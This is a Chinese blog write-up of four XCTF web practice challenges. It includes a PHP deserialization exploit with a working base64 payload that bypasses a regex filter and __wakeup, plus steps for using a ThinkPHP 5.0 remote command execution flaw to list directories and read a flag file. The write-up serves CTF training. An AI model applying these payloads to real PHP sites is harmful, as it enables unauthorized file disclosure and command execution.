XCTF攻防世界_Web进阶区001

最新推荐文章于 2022-04-13 17:58:36 发布
最新推荐文章于 2022-04-13 17:58:36 发布
阅读量164 收藏
点赞数
分类专栏: XCTF 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/FAFUxiaosong/article/details/109390502
版权

XCTF_Web_高手进阶区

baby_web

在这里插入图片描述
在这里插入图片描述
(1)按照提示,初始界面想到index.php,再次请求index.php后仍是1.php(被重定向了)。F12打开开发者模式查看“网络”模块,查看返回包发现确实有index.php,并且其中的location参数被设置为了1.php,同时发现flag
在这里插入图片描述
(2)也可以访问index.php,用Burp抓包,在响应包中发现flag
在这里插入图片描述

在这里插入图片描述

Training-WWW-Robots

在这里插入图片描述
(1)根据题目,熟悉robots.txt,在URL后加上/robots.txt
在这里插入图片描述
(2)发现一个fl0g.php文件,在URL后加上fl0g.php访问,得到flag
在这里插入图片描述

Web_php_unserialize

(1)先是一段代码审计

<?php 
class Demo { 
    private $file = 'index.php';
    public function __construct($file) { 
        $this->file = $file;  //构造函数,对类的变量进行初始化
    }
    function __destruct() { 
        echo @highlight_file($this->file, true); 
    }
//魔术方法,如果有反序列化的使用,在反序列化之前会先调用这个方法
    function __wakeup() { 
        if ($this->file != 'index.php') { 
            //the secret is in the fl4g.php
            $this->file = 'index.php'; 
        } 
    } 
}
if (isset($_GET['var'])) { 
    $var = base64_decode($_GET['var']); 
//正则匹配,如果在var变量中存在O/C:数字(O:数字或者C:数字这样的形式}),不区分大小写,就输出stop hacking!否则的话就进行发序列化
    if (preg_match('/[oc]:\d+:/i', $var)) { 
        die('stop hacking!'); 
    } else {
        @unserialize($var); 
    } 
} else { 
    highlight_file("index.php"); 
} 
?>

(2)审计完成之后,思路就很清晰了,对Demo这个类进行序列化,base64加密之后,赋值给var变量进行get传参就行了
在类Demo中有三个方法,一个构造,一个析构,还有就是一个魔术方法,构造函数__construct()在程序执行开始的时候对变量进行赋初值。析构函数__destruct(),在对象所在函数执行完成之后,会自动调用,这里就会高亮显示出文件。
在反序列化执行之前,会先执行__wakeup这个魔术方法,所以需要绕过,当成员属性数目大于实际数目时可绕过wakeup方法,正则匹配可以用+号来进行绕过。

<?php
class Demo {
private $file = 'index.php';
//protected $file1 = 'index.php';
public function __construct($file) {
    $this->file = $file;
    //$this->file1 = $file1;
}
function __destruct() {
    echo @highlight_file($this->file, true);
}
function __wakeup() {
    if ($this->file != 'index.php') {
        //the secret is in the fl4g.php
        $this->file = 'index.php';
    }
}
}
$a = new Demo("fl4g.php");
echo serialize($a)."\n";
//O:4:"Demo":1:{s:10:" Demo file";s:8:"fl4g.php";}
echo base64_encode('O:+4:"Demo":2:{s:10:" Demo file";s:8:"fl4g.php";}');

使用代码在线工具执行,https://tool.lu/coderunner/
在这里插入图片描述
修改之后,再进行base64加密,传参就可以了
index.php?var=TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==
在这里插入图片描述

php_rce

在这里插入图片描述

(1)进入后发现是一个php框架,根据题目php-rce远程命令执行,在github上查一下这个版本有什么漏洞
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
(2)发现有好几个版本,由于只知道是5.0,则随便输入一个试试,这里注意只从"?s"开始复制,"?s"之前的是靶场。
在这里插入图片描述
(3)得到进一步提示,为5.0.2版本,回到github找到5.0.2版本的再次复制,然后访问。发现可以进行远程命令执行。
在这里插入图片描述
(4)ls查看有没有什么提示信息,可用hackbar执行,或者直接在地址栏输入命令也可。这里注意要把原来最后一个"="后面的东西删掉再输入命令。
在这里插入图片描述
(5)ls后没有发现有用信息,接着查找上一级目录,直到发现flag
在这里插入图片描述
(6)然后输入查看命令 cat /flag即可看到flag
在这里插入图片描述
(7)也可以无需一级一级目录的找,使用命令find / -name flag,也可找到flag,然后cat /flag 就可以看到flag了。
在这里插入图片描述

FAFU小宋
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界XCTF—web入门题知识点、提高题Writeup
AugenStern的博客
08-21 836
WriteUpXCTF-Web新手入门view_sourceget_postrobotsbackupcookiedisabled buttonsimple jsxff refererweak authwebshellcommand executionsimple_php高手 XCTF-Web 2016 年全国大学生信息安全竞赛开始设立创新实践技能赛,采取的就是传统的 CTF 赛制。在《2016年全国大学生信息安全竞赛参赛指南》中主办方给出的竞赛内容相对全面,值得参考。 系统安全。 涉及操作系统和
XCTF1-web ics-06 POST&GET inget
orchid_sea的博客
11-16 226
云平台报表中心收集了设备管理基础服务的数据,但是数据被删除了,只有一处留下了入侵者的痕迹。X老师告诉小宁同学HTTP通常使用两种请求方法,你知道是哪两种吗?查看源码和响应没有flag,修改任何日期也没有响应。尝试GET注入,测试注入点时,可以得到flag。传入参数a=1后,提示继续POST提交参数。爆破出来,当id=2333时,长度不同。使用HackBar工具提交POST参数。发现存在GET参数id,尝试爆破。该位置提示存在flag。提示从GET方式注入。
XCTF 攻防世界 Web题的基本知识点
weixin_43456810的博客
11-28 2155
XCTF 攻防世界 Web题的基本知识点和解题思路 大多数情况下,robots协议指的就是robots.txt index.php的备份文件:/index.php.bak 页面中如果出现了不能按的按钮,可能是代码中设置了disable参数,将网页源代码中的disable=""删除或者改为false(注意:safari浏览器可能无法方便的直接修改源代码,可以换为firefox浏览器) 遇到php的源代码,注重分析,如果只是简短的几行代码,并且有类似于$a, $b这样的变量,可以直接在url的后面添加上 /?
攻防世界XCTF-WEB入门全通关
qq_35664104的博客
08-23 1755
为了更好的体验,请见我的---->个人博客 XCTF的web块入门非常简单,适合一些刚解除安全或者对网络安全常识比较了解的同学在安全搞累之余娱乐娱乐。 其主要考察下面几点: 基本的PHP、Python、JS语法 基本的代理BurpSuite使用 基本的HTTP请求交互过程 基本的安全知识(Owasp top10) 1.View_source 题目描述:X老师让小宁同学查看一个网页的源代码,但小宁同学发现鼠标右键好像不管用了。 想当然的这道题是考验一个查看网页前端源代码的常识,除了鼠标右键查看
xctf_web题解(入门1--6)
HelloWorld's blog
12-13 2750
xctf_web题解(新手1—6) ps:说明一下,这次这个题解可能是比较是比较low的,因为前一段时间在玩学校的vhdl来实现eda的大作业,花了我一段比较长的时间,另外之前一段时间再刷密码学的相关知识,也没这么去了解这个web这个方向的,对于小组内的blog我也就只能写写题解了,以后可能做了一些项目会写一些其他有意思的东西 1.view_source 据题目描述,这道题的flag应该是在网页的源代码中的,但是鼠标右键点不了。那么这里有其他的解决方法,我在这里主要说两个解决方法:1.就是在网址上直接输
XCTF攻防世界web.doc
09-19
XCTF攻防世界Web WriteUp】 在网络安全竞赛中,CTF(Capture The Flag)是一种常见的形式,其中“XCTF攻防世界”是一个专注于Web安全的平台,旨在帮助参与者提升网络安全技能,特别是Web应用的安全防御和攻击能力...
xctf.rar_HTML5自适应
09-19
这个"xctf.rar"压缩包包含了一个实现HTML5全屏滚动效果的源码,它能实现平滑滚动,并且能够自适应不同浏览器的显示。 全屏滚动,也称为全屏滑动或全景观览,是一种让网页内容以连续的全屏视图展示的设计方式。这种...
XCTF_A_应收管理标准功能培训.pptx
10-11
XCTF_A_应收管理标准功能培训】的PPT内容涵盖了Oracle财务系统的应收管理模块,这个模块是企业销售到收款流程中的关键部分。以下是基于提供的文件内容详细解析的知识点: 1. **销售到收款流程概览**: - 销售到...
XCTF_A_物料清单标准功能培训.pptx
10-11
XCTF_A_物料清单标准功能培训中,主要涵盖了Oracle系统的物料管理及相关流程,旨在提升用户对物料清单(BOM)的运用和理解。以下是详细的讲解内容: 1. **物料管理**: - **系统组织架构**:Oracle系统中的组织...
XCTF_A_成本管理标准功能培训.pptx
09-25
### XCTF_A_成本管理标准功能培训知识点梳理 #### 一、成本管理概述 - **培训目的**: 介绍Oracle标准功能中的成本管理模块,帮助企业更好地理解成本管理的重要性,并掌握其核心功能。 - **成本管理作用**: 成本管理...
「干货」XCTF Web安全入门练习靶场全部通关教程
橙留香Park的博客
04-13 6867
转移发布平台通知:将不再在CSDN博客发布新文章,敬请移步知识星球... ...
(日更)PHP反序化漏洞解析(3) 漏洞利用条件及利用实例 XCTFWeb_php_unserialize
AAAAAAAAAAAA66的博客
11-28 812
------------------------------------------------------------------------------------------------------------------ 昨天打了一场CTF,断更了一天。。。 ------------------------------------------------------------------------------------------------------------------ .
攻防世界Web篇2(3分题)
chuxuezheerer的博客
02-07 613
3分题 一.Web_python_template_injection 二.Web_php_unserialize 三.php_rce 四.Web_php_include 五.ics-06 六.warmup 七.lottery 八.mfw 九.web2 十 .PHP2
CTFweb篇-反序列化和SESSION(一)
weixin_44597701的博客
08-09 1076
前面讲到过一点SESSION,这里要继续说一点 SESSION的几种形式 这里是binary session的形成方法可以在php.ini中设置。默认是php(可能是php_serialize) 例子: php形式: php_serialize形式: php_binary: ini_set() ini_set ( string $varname , string $newvalue ) 在配置文件中设置配置的值 ini_set('session.serialize_handles','php')
[漏洞利用] CVE-2016-7124 漏洞复现(总结自一CTF题目)
热门推荐
Y4tacker的博客
07-21 1万+
文章目录漏洞影响的版本漏洞利用方法演示漏洞复现案例代码正常效果修改参数后的效果 漏洞影响的版本 从官网得知 PHP5 < 5.6.25 PHP7 < 7.0.10 漏洞利用方法 若在对象的魔法函数中存在的__wakeup方法,那么之后再调用 unserilize() 方法行反序列化之前则会先调用__wakeup方法,但是序列化字符串中表示对象属性个数的值大于真实的属性个数时会跳过__wakeup的执行 演示 可能上面说的有点抽象就拿我今天遇到一道题来做个案例,运行下图 <?php cla
web
weixin_43940853的博客
10-14 214
i春秋(VID) 首先查看源码,提示访问index.php.txt,得到一些代码,这里简单整理一下 Finding entry points Branch analysis from position: 0 Jump found. Position 1 = 23, Position 2 = 38 Branch analysis from position: 23 Jump found. Posit...
攻防世界webWeb_php_unserialize
gongjingege的博客
07-21 422
打开链接后,源码审计 1,unserialize时,_wakeup()的绕过 //只需要令序列化字符串中标识变量数量的值大于实 际变量 2,绕过preg_match正则,因为正则会过滤掉序列化开头的字母O //使用+可以绕过preg_match() 正则匹配,O:4改成O:+4 这里参考了大佬的反序列化代码 因为题目还要求base64解码再赋值给var传参 所以运行一下后构造payload payload: /index.php?var=TzorNDoiRGVtbyI6Mjp7czoxM
攻防世界-Web篇-006Web_php_unserialize】
gyy990526的博客
03-14 1976
解:打开靶机是一段php代码,代码审计,发现是一道反序列化问题。在上一篇咱们提到过_wakeup()函数需要通过不正确的属性值来绕过,所以这一点已经解决。 <?php class Demo { private $file = 'index.php'; public function __construct($file) { //创建时执行 $this->file = $file; } function __destruct() { //摧
WEB
weixin_43741181的博客
09-02 612
1.百度杯ctf10月 Hash 打开题目发现hahaha的一个链接,去查看源码发现, 大概意思为key!=123和它对应hash传回去,就能得到flag。 http://e105ddee2a824b1e8e05d6c8fbea9571c4f4f16ed2d24d7d.changame.ichunqiu.com/index.php?key=123&hash=f9109d5f8...
攻防世界traffic
最新发布
07-28
- *1* *2* [xctf攻防世界 Web高手 easytornado](https://blog.csdn.net/l8947943/article/details/126174257)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值